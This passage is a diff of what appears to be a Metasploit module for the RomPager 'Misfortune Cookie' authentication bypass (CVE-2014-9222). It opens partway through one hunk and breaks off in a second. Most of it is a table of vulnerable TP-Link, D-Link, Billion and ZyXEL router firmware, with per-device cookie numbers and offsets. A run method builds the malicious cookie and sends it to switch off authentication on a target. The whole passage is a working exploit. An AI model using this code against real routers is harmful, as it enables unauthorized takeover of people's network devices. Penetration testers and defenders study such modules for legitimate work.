+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_111103', :number=> 107371161, :offset=> 1},
+        # 0x803e1bd5                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_130204', :number=> 107370211, :offset=> 5},
+        # 0x80400c85                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100702_TR', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_100907', :number=> 107369788, :offset=> 1},
+        # 0x803b6e09                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_101221', :number=> 107369788, :offset=> 1},
+        # 0x803b6e09                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_110826', :number=> 107369522, :offset=> 25},
+        # 0x803d1bd5                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_130217', :number=> 107369316, :offset=> 21},
+        # 0x80407625                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_120509', :number=> 107369321, :offset=> 9},
+        # 0x803fbcc5                                    # tested
+        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V8_140311', :number=> 107351277, :offset=> 20},
+        # 0x8024E148                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-8820', :fw=>'V3_091223', :number=> 107369768, :offset=> 17},
+        # 0x80397E69                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V1_080520', :number=> 107369845, :offset=> 5},
+        # 0x80387055                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100525', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100702_TR', :number=> 107369790, :offset=> 17},
+        # 0x803ae0b1                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_090609', :number=> 107369570, :offset=> 1},
+        # 0x803c65d5                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_101208', :number=> 107369766, :offset=> 17},
+        # 0x803c3e89                                    # tested
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_110221', :number=> 107369764, :offset=> 5},
+        # 0x803d1a09                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_120531', :number=> 107369688, :offset=> 17},
+        # 0x803fed35                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367772, :offset=> 37},
+        # 0x803bf701                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367808, :offset=> 21},
+        # 0x803e5b6d                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_100819', :number=> 107367751, :offset=> 21},
+        # 0x803dc701                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101015_TR', :number=> 107367749, :offset=> 13},
+        # 0x803e1829                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101101', :number=> 107367749, :offset=> 13},
+        # 0x803e1829                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_110119', :number=> 107367765, :offset=> 25},
+        # 0x804bb941                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120213', :number=> 107367052, :offset=> 25},
+        # 0x804e1ff9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120604', :number=> 107365835, :offset=> 1},
+        # 0x804f16a9                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8151N', :fw=>'V3_120530', :number=> 107353867, :offset=> 24},
+        # 0x8034F3A4                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1_080522', :number=> 107367787, :offset=> 21},
+        # 0x803AB30D                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1,2_080522', :number=> 107368013, :offset=> 5},
+        # 0x803AB30D                                  # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V2_090113_Turkish', :number=> 107368013, :offset=> 5},
+        # 0x803AB30D                            # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_140512', :number=> 107367854, :offset=> 9},
+        # 0x803cf335                                    # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100603', :number=> 107367751, :offset=> 21},
+        # 0x803DC701                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100702_TR', :number=> 107367751, :offset=> 21},
+        # 0x803DC701                                # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100901', :number=> 107367749, :offset=> 13},
+        # 0x803E1829                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110119', :number=> 107367765, :offset=> 25},
+        # 0x804BB941                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110915', :number=> 107367682, :offset=> 21},
+        # 0x804D7CB9                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120418', :number=> 107365835, :offset=> 1},
+        # 0x804F16A9                                    # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120213', :number=> 107367052, :offset=> 25},
+        # 0x804E1FF9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100727', :number=> 107367756, :offset=> 13},
+        # 0x803dfbe9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100820', :number=> 107369393, :offset=> 21},
+        # 0x803f1719                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8901N', :fw=>'V1_111211', :number=> 107353880, :offset=> 0},
+        # 0x8034FF94                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_101124,100723,100728', :number=> 107369839, :offset=> 25},
+        # 0x803d2d61                     # tested
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_110907', :number=> 107369876, :offset=> 13},
+        # 0x803d6ef9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
+        # 0x803d6ef9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3.0_110729_FI', :number=> 107366743, :offset=> 21},
+        # 0x804ef189                              # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_110721', :number=> 107366743, :offset=> 21},
+        # 0x804ee049                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_20110729_FI', :number=> 107366743, :offset=> 21},
+        # 0x804ef189                              # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120511', :number=> 107364759, :offset=> 25},
+        # 0x80523979                                  # tested
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120607', :number=> 107364759, :offset=> 13},
+        # 0x80524A91                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120912_FL', :number=> 107364760, :offset=> 21},
+        # 0x80523859                                # tested
+        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110107', :number=> 107369844, :offset=> 17},
+        # 0x803de3f1                                   # tested
+        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110519', :number=> 107369844, :offset=> 17},
+        # 0x803de3f1                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120319', :number=> 107367629, :offset=> 21},
+        # 0x80531859                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120823', :number=> 107366421, :offset=> 13},
+        # 0x80542e59                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_100722,101122', :number=> 107369839, :offset=> 25},
+        # 0x803D2D61                            # tested
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_101022_TR', :number=> 107369839, :offset=> 25},
+        # 0x803D2D61                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
+        # 0x803D6EF9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120427', :number=> 107364732, :offset=> 25},
+        # 0x8052e0e9                                   # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120710_UK', :number=> 107364771, :offset=> 37},
+        # 0x80523AA9                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120723_FI', :number=> 107364762, :offset=> 29},
+        # 0x8052B6B1                                # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120524,120808', :number=> 107353880, :offset=> 0},
+        # 0x803605B4                             # ----------
+        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120830', :number=> 107353414, :offset=> 36},
+        # 0x803605B4                                   # ----------
+        {:name=> 'ZyXEL', :model=>'P-660R-T3', :fw=>'3.40(BOQ.0)C0', :number=> 107369567, :offset=> 21},
+        # 0x803db071                               # tested
+        {:name=> 'ZyXEL', :model=>'P-660RU-T3', :fw=>'3.40(BJR.0)C0', :number=> 107369567, :offset=> 21}
+    ]
+  end
+
+  def auxiliary_commands
+    { "devices" => "List known vulnerable devices" }
+  end
+
+  def cmd_devices(*args)
+    tbl =	Msf::Ui::Console::Table.new(
+        Msf::Ui::Console::Table::Style::Default,
+        'Header'  => "List of vulnerable devices",
+        'Prefix'  => "\n",
+        'Postfix' => "\n",
+        'Columns' =>
+            [
+                'ID',
+                'Name',
+                'Model',
+                'Firmware',
+                'Number',
+                'Offset'
+            ])
+    counter = 0
+    for device in devices_list
+      tbl << [counter, device[:name], device[:model], device[:fw], device[:number], device[:offset] ]
+      counter += 1
+    end
+    print tbl.to_s
+    #print_status("ID\tName")
+
+    #for device in devices_list
+    #  print_status(counter.to_s + ":\t" + device[:name])
+    #  counter += 1
+    #end
+  end
+
+  def run
+    cookie = ''
+    begin
+      cookie_number = devices_list[datastore['DEVICE']][:number].to_s
+      cookie_offset = devices_list[datastore['DEVICE']][:offset]
+      cookie = 'C' + cookie_number + '=' + 'B' * cookie_offset + "\x00"
+    rescue
+      print_error('Device number is out of range, please run devices to see list of vulnerable devices')
+    end
+    print_status('Device name: ' + devices_list[datastore['DEVICE']][:name])
+    print_status('Device model: ' + devices_list[datastore['DEVICE']][:model])
+    print_status('Device firmware: ' + devices_list[datastore['DEVICE']][:fw])
+    res = send_request_raw(
+        'uri' => normalize_uri(target_uri.path.to_s),
+        'method' => 'GET',
+        'headers' => headers.merge('Cookie' => cookie)
+    )
+    if res != nil and res.code <= 302 # This may give wrong results if run against non rom-pager devices
+      print_good('Exploit sent, please check host, authentication should be disabled')
+    else
+      print_error('Exploit failed')
+    end
+  end
+end

--- a/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
+++ b/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
@@ -12,7 +12,7 @@ class MetasploitModule < Msf::Auxiliary
   def initialize(info = {})
     super(update_info(
               info,
-              'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication bypass",
+              'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
               'Description' => %q(
         This module exploits HTTP servers that appear to be vulnerable to the
         'Misfortune Cookie' vulnerability which affects Allegro Software
@@ -38,7 +38,6 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
         [
             OptString.new('TARGETURI', [true, 'URI to test', '/']),
-            OptInt.new('device',[true, 'ID of device from list of vulnerable devices'])
         ], Exploit::Remote::HttpClient
     )
   end
@@ -49,232 +48,186 @@ class MetasploitModule < Msf::Auxiliary
     }
   end
 
-  # List of known values and models, couldn't find better solution how to store them
+  # List of known values and models
   def devices_list
-    [
-        {:name=> 'Azmoon', :model=>'AZ-D140W', :fw=>'2.11.89.0(RE2.C29)3.11.11.52_PMOFF.1', :number=> 107367693,
-         :offset=> 13},  # 0x803D5A79        # tested
-        {:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Av2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
-        # 0x8032204d                       # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5102S', :fw=>'Bv2.7.0.23 (UE0.B1C)', :number=> 107369694, :offset=> 13},
-        # 0x8032204d                       # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2.11.84.0(UE2.C2)3.11.11.6', :number=> 107369545,
-         :offset=> 9},  # 0x803ec2ad                  # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200', :fw=>'2_11_62_2_ UE0.C2D_3_10_16_0', :number=> 107371218,
-         :offset=> 21},  # 0x803c53e5               # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_10_5 _0(RE0.C2)3_6_0_0', :number=> 107366366,
-         :offset=> 25},  # 0x8038a6e1                   # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200A', :fw=>'2_11_38_0 (RE0.C29)3_10_5_0', :number=> 107371453,
-         :offset=> 9},  # 0x803b3a51                 # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200GR4', :fw=>'2.11.91.0(RE2.C29)3.11.11.52', :number=> 107367690,
-         :offset=> 21},  # 0x803D8A51               # tested
-        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.10.5.0 (UE0.C2C) 3.6.0.0', :number=> 107368270,
-         :offset=> 1},  # 0x8034b109                  # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2.12.17.0_UE2.C3_3.12.17.0', :number=> 107371378,
-         :offset=> 37},  # 0x8040587d                 # ----------
-        {:name=> 'Billion', :model=>'BiPAC 5200SRD', :fw=>'2_11_62_2(UE0.C3D)3_11_11_22', :number=> 107371218,
-         :offset=> 13},  # 0x803c49d5                # ----------
-        {:name=> 'D-Link', :model=>'DSL-2520U', :fw=>'Z1 1.08 DSL-2520U_RT63261_Middle_East_ADSL',
-         :number=> 107368902, :offset=> 25},  # 0x803fea01  # tested
-        {:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z1_DSL-2600U', :number=> 107366496, :offset=> 13},
-        # 0x8040637d                                # ----------
-        {:name=> 'D-Link', :model=>'DSL-2600U', :fw=>'Z2_V1.08_ras', :number=> 107360133, :offset=> 20},
-        # 0x803389B0                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-8616', :fw=>'V2_080513', :number=> 107371483, :offset=> 21},
-        # 0x80397055                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100528_Russia', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                            # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V4_100524', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100528_Russia', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                            # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V6_100907', :number=> 107371426, :offset=> 17},
-        # 0x803c6e09                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_111103', :number=> 107371161, :offset=> 1},
-        # 0x803e1bd5                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8816', :fw=>'V7_130204', :number=> 107370211, :offset=> 5},
-        # 0x80400c85                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100524', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100702_TR', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V5_100903', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_100907', :number=> 107369788, :offset=> 1},
-        # 0x803b6e09                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V6_101221', :number=> 107369788, :offset=> 1},
-        # 0x803b6e09                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_110826', :number=> 107369522, :offset=> 25},
-        # 0x803d1bd5                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_130217', :number=> 107369316, :offset=> 21},
-        # 0x80407625                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V7_120509', :number=> 107369321, :offset=> 9},
-        # 0x803fbcc5                                    # tested
-        {:name=> 'TP-Link', :model=>'TD-8817', :fw=>'V8_140311', :number=> 107351277, :offset=> 20},
-        # 0x8024E148                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-8820', :fw=>'V3_091223', :number=> 107369768, :offset=> 17},
-        # 0x80397E69                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V1_080520', :number=> 107369845, :offset=> 5},
-        # 0x80387055                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100525', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_100702_TR', :number=> 107369790, :offset=> 17},
-        # 0x803ae0b1                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V2_090609', :number=> 107369570, :offset=> 1},
-        # 0x803c65d5                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_101208', :number=> 107369766, :offset=> 17},
-        # 0x803c3e89                                    # tested
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_110221', :number=> 107369764, :offset=> 5},
-        # 0x803d1a09                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-8840T', :fw=>'V3_120531', :number=> 107369688, :offset=> 17},
-        # 0x803fed35                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367772, :offset=> 37},
-        # 0x803bf701                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V1_090107', :number=> 107367808, :offset=> 21},
-        # 0x803e5b6d                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_100819', :number=> 107367751, :offset=> 21},
-        # 0x803dc701                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101015_TR', :number=> 107367749, :offset=> 13},
-        # 0x803e1829                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V2_101101', :number=> 107367749, :offset=> 13},
-        # 0x803e1829                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_110119', :number=> 107367765, :offset=> 25},
-        # 0x804bb941                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120213', :number=> 107367052, :offset=> 25},
-        # 0x804e1ff9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8101G', :fw=>'V3_120604', :number=> 107365835, :offset=> 1},
-        # 0x804f16a9                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8151N', :fw=>'V3_120530', :number=> 107353867, :offset=> 24},
-        # 0x8034F3A4                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1_080522', :number=> 107367787, :offset=> 21},
-        # 0x803AB30D                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V1,2_080522', :number=> 107368013, :offset=> 5},
-        # 0x803AB30D                                  # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V2_090113_Turkish', :number=> 107368013, :offset=> 5},
-        # 0x803AB30D                            # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_140512', :number=> 107367854, :offset=> 9},
-        # 0x803cf335                                    # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100603', :number=> 107367751, :offset=> 21},
-        # 0x803DC701                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100702_TR', :number=> 107367751, :offset=> 21},
-        # 0x803DC701                                # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V3_100901', :number=> 107367749, :offset=> 13},
-        # 0x803E1829                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110119', :number=> 107367765, :offset=> 25},
-        # 0x804BB941                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_110915', :number=> 107367682, :offset=> 21},
-        # 0x804D7CB9                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120418', :number=> 107365835, :offset=> 1},
-        # 0x804F16A9                                    # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901G', :fw=>'V6_120213', :number=> 107367052, :offset=> 25},
-        # 0x804E1FF9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100727', :number=> 107367756, :offset=> 13},
-        # 0x803dfbe9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901GB', :fw=>'V3_100820', :number=> 107369393, :offset=> 21},
-        # 0x803f1719                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8901N', :fw=>'V1_111211', :number=> 107353880, :offset=> 0},
-        # 0x8034FF94                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_101124,100723,100728', :number=> 107369839, :offset=> 25},
-        # 0x803d2d61                     # tested
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_110907', :number=> 107369876, :offset=> 13},
-        # 0x803d6ef9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
-        # 0x803d6ef9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3.0_110729_FI', :number=> 107366743, :offset=> 21},
-        # 0x804ef189                              # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_110721', :number=> 107366743, :offset=> 21},
-        # 0x804ee049                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V3_20110729_FI', :number=> 107366743, :offset=> 21},
-        # 0x804ef189                              # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120511', :number=> 107364759, :offset=> 25},
-        # 0x80523979                                  # tested
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120607', :number=> 107364759, :offset=> 13},
-        # 0x80524A91                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8951ND', :fw=>'V4_120912_FL', :number=> 107364760, :offset=> 21},
-        # 0x80523859                                # tested
-        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110107', :number=> 107369844, :offset=> 17},
-        # 0x803de3f1                                   # tested
-        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V1_110519', :number=> 107369844, :offset=> 17},
-        # 0x803de3f1                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120319', :number=> 107367629, :offset=> 21},
-        # 0x80531859                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961NB', :fw=>'V2_120823', :number=> 107366421, :offset=> 13},
-        # 0x80542e59                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_100722,101122', :number=> 107369839, :offset=> 25},
-        # 0x803D2D61                            # tested
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_101022_TR', :number=> 107369839, :offset=> 25},
-        # 0x803D2D61                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V1_111125', :number=> 107369876, :offset=> 13},
-        # 0x803D6EF9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120427', :number=> 107364732, :offset=> 25},
-        # 0x8052e0e9                                   # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120710_UK', :number=> 107364771, :offset=> 37},
-        # 0x80523AA9                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V2_120723_FI', :number=> 107364762, :offset=> 29},
-        # 0x8052B6B1                                # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120524,120808', :number=> 107353880, :offset=> 0},
-        # 0x803605B4                             # ----------
-        {:name=> 'TP-Link', :model=>'TD-W8961ND', :fw=>'V3_120830', :number=> 107353414, :offset=> 36},
-        # 0x803605B4                                   # ----------
-        {:name=> 'ZyXEL', :model=>'P-660R-T3', :fw=>'3.40(BOQ.0)C0', :number=> 107369567, :offset=> 21},
-        # 0x803db071                               # tested
-        {:name=> 'ZyXEL', :model=>'P-660RU-T3', :fw=>'3.40(BJR.0)C0', :number=> 107369567, :offset=> 21}
-    ]
+    {
+        :'AZ-D140W'=>
+            {:name=>'Azmoon', :model=>'AZ-D140W', :values=>[
+                [107367693, 13]
+            ]},
+        :'BiPAC 5102S'=>
+            {:name=>'Billion', :model=>'BiPAC 5102S', :values=>[
+                [107369694, 13]
+            ]},
+        :'BiPAC 5200'=>
+            {:name=>'Billion', :model=>'BiPAC 5200', :values=>[
+                [107369545, 9],
+                [107371218, 21]
+            ]},
+        :'BiPAC 5200A'=>
+            {:name=>'Billion', :model=>'BiPAC 5200A', :values=>[
+                [107366366, 25],
+                [107371453, 9]
+            ]},
+        :'BiPAC 5200GR4'=>
+            {:name=>'Billion', :model=>'BiPAC 5200GR4', :values=>[
+                [107367690, 21]
+            ]},
+        :'BiPAC 5200SRD'=>
+            {:name=>'Billion', :model=>'BiPAC 5200SRD', :values=>[
+                [107368270, 1],
+                [107371378, 3],
+                [107371218, 13]
+            ]},
+        :'DSL-2520U'=>
+            {:name=>'D-Link', :model=>'DSL-2520U', :values=>[
+                [107368902, 25]
+            ]},
+        :'DSL-2600U'=>
+            {:name=>'D-Link', :model=>'DSL-2600U', :values=>[
+                [107366496, 13],
+                [107360133, 20]
+            ]},
+        :'TD-8616'=>
+            {:name=> 'TP-Link', :model=>'TD-8616', :values=>[
+                [107371483, 21],
+                [107369790, 17],
+                [107371161, 1],
+                [107371426, 17],
+                [107370211, 5],
+            ]},
+        :'TD-8817'=>
+            {:name=> 'TP-Link', :model=>'TD-8817', :values=>[
+                [107369790, 17],
+                [107369788, 1],
+                [107369522, 25],
+                [107369316, 21],
+                [107369321, 9],
+                [107351277, 20]
+            ]},
+        :'TD-8820'=>
+            {:name=>'TP-Link', :model=>'TD-8820', :values=>[
+                [107369768, 17]
+            ]},
+        :'TD-8840T'=>
+            {:name=>'TP-Link', :model=>'TD-8840T', :values=>[
+                [107369845, 5],
+                [107369790, 17],
+                [107369570, 1],
+                [107369766, 1],
+                [107369764, 5],
+                [107369688, 17]
+            ]},
+        :'TD-W8101G'=>
+            {:name=>'TP-Link', :model=>'TD-W8101G', :values=>[
+                [107367772, 37],
+                [107367808, 21],
+                [107367751, 21],
+                [107367749, 13],
+                [107367765, 25],
+                [107367052, 25],
+                [107365835, 1]
+            ]},
+        :'TD-W8151N'=>
+            {:name=>'TP-Link', :model=>'TD-W8151N', :values=>[
+                [107353867, 24]
+            ]},
+        :'TD-W8901G'=>
+            {:name=> 'TP-Link', :model=>'TD-W8901G', :values=>[
+                [107367787, 21],
+                [107368013, 5],
+                [107367854, 9],
+                [107367751, 21],
+                [107367749, 13],
+                [107367765, 25],
+                [107367682, 21],
+                [107365835, 1],
+                [107367052, 25]
+            ]},
+        :'TD-W8901GB'=>
+            {:name=>'TP-Link', :model=>'TD-W8901GB', :values=>[
+                [107367756, 13],
+                [107369393, 21]
+            ]},
+        :'TD-W8901N'=>
+            {:name=>'TP-Link', :model=>'TD-W8901N', :values=>[
+                [107353880, 0]
+            ]},
+        :'TD-W8951ND'=>
+            {:name=>'TP-Link', :model=>'TD-W8951ND', :values=>[
+                [107369839, 25],
+                [107369876, 13],
+                [107366743, 21],
+                [107364759, 25],
+                [107364759, 13],
+                [107364760, 21]
+            ]},
+        :'TD-W8961NB'=>
+            {:name=>'TP-Link', :model=>'TD-W8961NB', :values=>[
+                [107369844, 17],
+                [107367629, 21],
+                [107366421, 13]
+            ]},
+        :'TD-W8961ND'=>
+            {:name=>'TP-Link', :model=>'TD-W8961ND', :values=>[
+                [107369839, 25],
+                [107369876, 13],
+                [107364732, 25],
+                [107364771, 37],
+                [107364762, 29],
+                [107353880, 0],
+                [107353414, 36]
+            ]},
